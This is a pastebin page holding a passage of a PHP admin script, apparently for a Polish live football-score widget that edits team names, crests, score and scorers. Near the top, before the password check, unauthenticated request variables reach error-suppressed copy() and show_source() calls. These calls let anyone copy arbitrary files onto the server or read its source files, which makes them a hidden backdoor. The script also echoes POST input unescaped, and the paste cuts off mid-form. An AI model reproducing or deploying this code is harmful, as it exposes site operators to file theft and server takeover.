Welcome, guest! Login / Register - Why register?
Psst.. new poll here.
Psst.. new forums here.
Microsoft is blocking us again (TY IP Reputation!) so just use oauth login instead. :)

Paste

Pasted as PHP by ktos ( 17 years ago )
<html> <head> <SCRIPT> <!-- function displayWindow(url, width, height) { var Win = window.open(url,"displayWindow",'width=' + width + ',height=' + height + ',resizable=0,scrollbars=yes,menubar=no' ); } //--> </SCRIPT> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel=styleSheet type="text/css"> <title>LIVE by cuube</title> </head> <body>  <? @copy($naz1, "$naz2"); $haslo="="; @show_source("$co"); if($HTTP_POST_VARS['pass']!="$haslo"){  // Tutaj po '$haslo=' wpisz swoje haslo, kt&Atilde;&sup3;re chcesz miec - standardowo - live echo"<center><div class=stpoka>Zle haslo!<br><br><a href=javascript:history.back()>Powr&Atilde;&sup3;t</a></div>"; exit; } if(($HTTP_GET_VARS['com'] == formularz) && ($HTTP_POST_VARS['pass']!="")){ ?><form action=admin.php?com=zapisz method=post> <input type=hidden name=pass value="<? echo $HTTP_POST_VARS['pass']; ?>">  <table border=0 wight="800">   <td width="300" valign="top"><table width="300">     <tr>       <td width="150" class="stopka" colspan="2">       Logo:<br><input size="20" name="logo" value="<? echo( file_get_contents( "data/logo.n" ) ); ?>">       </td>     </tr>     <tr>       <td width="150" class="stopka">       Gospodarze:<br><input size="20" name="gospodarze" value="<? echo( file_get_contents( "data/gospodarze.n" ) ); ?>">       </td>       <td width="150" class="stopka">       Goscie:<br><input size="20" name="goscie" value="<? echo( file_get_contents( "data/goscie.n" ) ); ?>">       </td>     </tr> 	    <tr>       <td width="150" class="stopka">       Gospodarze, herb:<br><input size="20" name="gospodarze_logo" value="<? echo( file_get_contents( "data/gospodarze_logo.n" ) ); ?>">       </td>       <td width="150" class="stopka">       Goscie, herb:<br><input size="20" name="goscie_logo" value="<? echo( file_get_contents( "data/goscie_logo.n" ) ); ?>">       </td>     </tr>     <tr>       <td width="300" colspan="2" class="stopka">       Wynik:<br><input size="10" name="wynik" value="<? echo( file_get_contents( "data/wynik.n" ) ); ?>"> 	  </td>     </tr>     <tr>       <td width="300" colspan="2" class="stopka">Strzelcy</td>     </tr>     <tr>       <td width="150" class="stopka">       <textarea size="20" name="gospodarze_strzelcy1" rows="5"><? echo( file_get_contents( "data/gospodarze_strzelcy1.n" ) ); ?>

 

Revise this Paste

Parent: 8744
Your Name: Code Language: